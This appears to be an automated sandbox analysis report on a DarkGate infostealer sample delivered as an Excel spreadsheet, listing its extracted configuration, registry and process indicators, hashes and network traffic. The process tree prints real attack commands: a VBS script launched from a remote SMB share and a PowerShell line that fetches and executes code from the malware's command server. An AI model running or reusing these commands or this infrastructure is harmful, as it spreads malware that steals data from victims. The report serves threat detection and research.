darkgate | 535dd498b529c109d05d517f329897f64fd15ea57f841f4deb111262b011fc60

Analysis

max time kernel
134s
max time network
144s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
28/02/2024, 21:20 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

scan-28-02-24_4761.xlsx
Size

29KB
MD5

78d125fd15824e5ca1a3f7d99d7d8e54
SHA1

e905149cd68a5961ee9fb4760c29f17b3fa6b524
SHA256

535dd498b529c109d05d517f329897f64fd15ea57f841f4deb111262b011fc60
SHA512

266620784bb52ebbec6e533ca306bca8f753b311a6a76dcd3759e0614bf6f64dc124363b747fbfecc09fab3edd4da2c4e0908ae9a04a67c5438e6a0bbba63fd3
SSDEEP

768:wnEQpllh7tAafroiianGoHoJ+yWWn0Wht3p1:nQJh7Lro4ntD+0AZ1

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

cayennesxque.boo

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
true
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
ekoRFSqn
minimum_disk
50
minimum_ram
7000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral1/memory/2848-257-0x0000000005840000-0x0000000005B8F000-memory.dmp	family_darkgate_v6
behavioral1/memory/2848-258-0x0000000005840000-0x0000000005B8F000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1640	1328	WScript.exe	72

Blocklisted process makes network request 4 IoCs

flow	pid	Process
29	1976	powershell.exe
31	1976	powershell.exe
32	1976	powershell.exe
33	1976	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2848	AutoIt3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1328	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1328	EXCEL.EXE
1328	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE
1328	EXCEL.EXE

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1328 wrote to memory of 1640	1328	EXCEL.EXE	76
PID 1328 wrote to memory of 1640	1328	EXCEL.EXE	76
PID 1640 wrote to memory of 1976	1640	WScript.exe	77
PID 1640 wrote to memory of 1976	1640	WScript.exe	77
PID 1976 wrote to memory of 2848	1976	powershell.exe	79
PID 1976 wrote to memory of 2848	1976	powershell.exe	79
PID 1976 wrote to memory of 2848	1976	powershell.exe	79

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_4761.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1976
  - - C:\temp\AutoIt3.exe
      "C:\temp\AutoIt3.exe" script.a3x
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:2848

Network

DNS

97.32.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.32.109.52.in-addr.arpa

IN PTR

Response
DNS

2.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.159.190.20.in-addr.arpa

IN PTR

Response
DNS

177.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

177.178.17.96.in-addr.arpa

IN PTR

Response

177.178.17.96.in-addr.arpa

IN PTR

a96-17-178-177deploystaticakamaitechnologiescom
DNS

16.234.44.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.234.44.23.in-addr.arpa

IN PTR

Response

16.234.44.23.in-addr.arpa

IN PTR

a23-44-234-16deploystaticakamaitechnologiescom
DNS

8.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.179.89.13.in-addr.arpa

IN PTR

Response
DNS

186.197.45.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

186.197.45.147.in-addr.arpa

IN PTR

Response

186.197.45.147.in-addr.arpa

IN PTR

vm333776cloudnuxtnetwork
DNS

cayennesxque.boo

powershell.exe

Remote address:

8.8.8.8:53

Request

cayennesxque.boo

IN A

Response

cayennesxque.boo

IN A

194.165.59.187
GET

http://cayennesxque.boo/qdfjfvph

powershell.exe

Remote address:

194.165.59.187:80

Request

GET /qdfjfvph HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: cayennesxque.boo
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: close
Content-Disposition: attachment; filename="qdfjfvph"
Content-Type: application/octet-stream
Content-Length: 347
Date: Wed, 28 Feb 2024 21:21:31 GMT
DNS

187.59.165.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.59.165.194.in-addr.arpa

IN PTR

Response

187.59.165.194.in-addr.arpa

IN PTR

vm2117945stark-industries solutions
GET

http://cayennesxque.boo/a

powershell.exe

Remote address:

194.165.59.187:80

Request

GET /a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: cayennesxque.boo

Response

HTTP/1.1 200 OK

Connection: close
Content-Disposition: attachment; filename="Autoit3.exe"
Content-Type: application/octet-stream
Content-Length: 893608
Date: Wed, 28 Feb 2024 21:21:32 GMT
GET

http://cayennesxque.boo/egmnpxxg

powershell.exe

Remote address:

194.165.59.187:80

Request

GET /egmnpxxg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: cayennesxque.boo

Response

HTTP/1.1 200 OK

Connection: close
Content-Disposition: attachment; filename="egmnpxxg"
Content-Type: application/octet-stream
Content-Length: 479398
Date: Wed, 28 Feb 2024 21:21:33 GMT
GET

http://cayennesxque.boo/qiacszkt

powershell.exe

Remote address:

194.165.59.187:80

Request

GET /qiacszkt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
Host: cayennesxque.boo

Response

HTTP/1.1 200 OK

Connection: close
Content-Disposition: attachment; filename="qiacszkt"
Content-Type: application/octet-stream
Content-Length: 76
Date: Wed, 28 Feb 2024 21:21:35 GMT
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom
DNS

91.16.208.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.16.208.104.in-addr.arpa

IN PTR

Response

52.142.223.178:80

52 B
1
138.91.171.81:80

92 B
2
147.45.197.186:445

smb

6.1kB
11.4kB
35
34
194.165.59.187:80

http://cayennesxque.boo/qdfjfvph

http

powershell.exe

396 B
749 B
5
5

HTTP Request

GET http://cayennesxque.boo/qdfjfvph

HTTP Response

200
194.165.59.187:80

http://cayennesxque.boo/a

http

powershell.exe

15.5kB
920.3kB
335
663

HTTP Request

GET http://cayennesxque.boo/a

HTTP Response

200
194.165.59.187:80

http://cayennesxque.boo/egmnpxxg

http

powershell.exe

8.6kB
493.9kB
183
358

HTTP Request

GET http://cayennesxque.boo/egmnpxxg

HTTP Response

200
194.165.59.187:80

http://cayennesxque.boo/qiacszkt

http

powershell.exe

372 B
477 B
5
5

HTTP Request

GET http://cayennesxque.boo/qiacszkt

HTTP Response

200

8.8.8.8:53

97.32.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.32.109.52.in-addr.arpa
8.8.8.8:53

2.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.159.190.20.in-addr.arpa
8.8.8.8:53

177.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

177.178.17.96.in-addr.arpa
8.8.8.8:53

16.234.44.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

16.234.44.23.in-addr.arpa
8.8.8.8:53

8.179.89.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

8.179.89.13.in-addr.arpa
8.8.8.8:53

186.197.45.147.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

186.197.45.147.in-addr.arpa
8.8.8.8:53

cayennesxque.boo

dns

powershell.exe

62 B
78 B
1
1

DNS Request

cayennesxque.boo

DNS Response

194.165.59.187
8.8.8.8:53

187.59.165.194.in-addr.arpa

dns

73 B
123 B
1
1

DNS Request

187.59.165.194.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

194.178.17.96.in-addr.arpa
8.8.8.8:53

91.16.208.104.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

91.16.208.104.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1yeka3z.2hz.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\temp\script.a3x

Filesize
468KB

MD5
5dc0a5b884e44209941ec370406fbcc5

SHA1
b06cf5d11a5a7252afff61c1a787fb27ff126e28

SHA256
68acdae5c94dcfc0adaa1e1965166b3d2b4b8f1f889bce4610dbd1a0b72e2bc9

SHA512
0e11e3281175b0c9bdbe2474830fcd38de05e18e6edac4c1b0cd9c334ced89738c2eaf1bdf90c5e6b08c20faf96a6bdd574a472f81bc84355b69fc60832cbb53

Download Submit
C:\temp\test.txt

Filesize
76B

MD5
8b428b9d5c33c6ed79386d4c10600cd8

SHA1
0f4bbafe0abe6cf3f3542d49a9eed5db84f9ef7e

SHA256
424ef27370eb401871db935fc3fa3811179f5786fe777182550299aa8230f6b6

SHA512
307e7d4228577259a4cc3874da09408e45401b46739ccaa96e0bd5a0f6aedb362dd97528aa2acc79d3698710d85c283afd0649ec412dcba8c9f8df1339e3b892

Download Submit
memory/1328-24-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-28-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-6-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-8-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-10-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-11-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-12-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-14-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-13-0x00007FFEBF6F0000-0x00007FFEBF700000-memory.dmp

Filesize
64KB

Download
memory/1328-15-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-16-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-17-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-18-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-19-0x00007FFEBF6F0000-0x00007FFEBF700000-memory.dmp

Filesize
64KB

Download
memory/1328-21-0x00007FFF02960000-0x00007FFF02A0E000-memory.dmp

Filesize
696KB

Download
memory/1328-20-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-22-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-27-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-0-0x00007FFEC2E90000-0x00007FFEC2EA0000-memory.dmp

Filesize
64KB

Download
memory/1328-25-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-4-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-26-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-23-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-179-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-182-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-2-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-1-0x00007FFEC2E90000-0x00007FFEC2EA0000-memory.dmp

Filesize
64KB

Download
memory/1328-3-0x00007FFEC2E90000-0x00007FFEC2EA0000-memory.dmp

Filesize
64KB

Download
memory/1328-191-0x00007FFF02E00000-0x00007FFF02FDB000-memory.dmp

Filesize
1.9MB

Download
memory/1328-192-0x00007FFF02960000-0x00007FFF02A0E000-memory.dmp

Filesize
696KB

Download
memory/1328-5-0x00007FFEC2E90000-0x00007FFEC2EA0000-memory.dmp

Filesize
64KB

Download
memory/1976-193-0x000001FC44480000-0x000001FC44490000-memory.dmp

Filesize
64KB

Download
memory/1976-190-0x000001FC44980000-0x000001FC449F6000-memory.dmp

Filesize
472KB

Download
memory/1976-210-0x000001FC44480000-0x000001FC44490000-memory.dmp

Filesize
64KB

Download
memory/1976-215-0x000001FC450E0000-0x000001FC452A2000-memory.dmp

Filesize
1.8MB

Download
memory/1976-189-0x000001FC44480000-0x000001FC44490000-memory.dmp

Filesize
64KB

Download
memory/1976-247-0x000001FC44480000-0x000001FC44490000-memory.dmp

Filesize
64KB

Download
memory/1976-188-0x00007FFEDCCC0000-0x00007FFEDD6AC000-memory.dmp

Filesize
9.9MB

Download
memory/1976-185-0x000001FC2C2C0000-0x000001FC2C2E2000-memory.dmp

Filesize
136KB

Download
memory/1976-254-0x00007FFEDCCC0000-0x00007FFEDD6AC000-memory.dmp

Filesize
9.9MB

Download
memory/2848-256-0x0000000004350000-0x0000000005320000-memory.dmp

Filesize
15.8MB

Download
memory/2848-257-0x0000000005840000-0x0000000005B8F000-memory.dmp

Filesize
3.3MB

Download
memory/2848-258-0x0000000005840000-0x0000000005B8F000-memory.dmp

Filesize
3.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.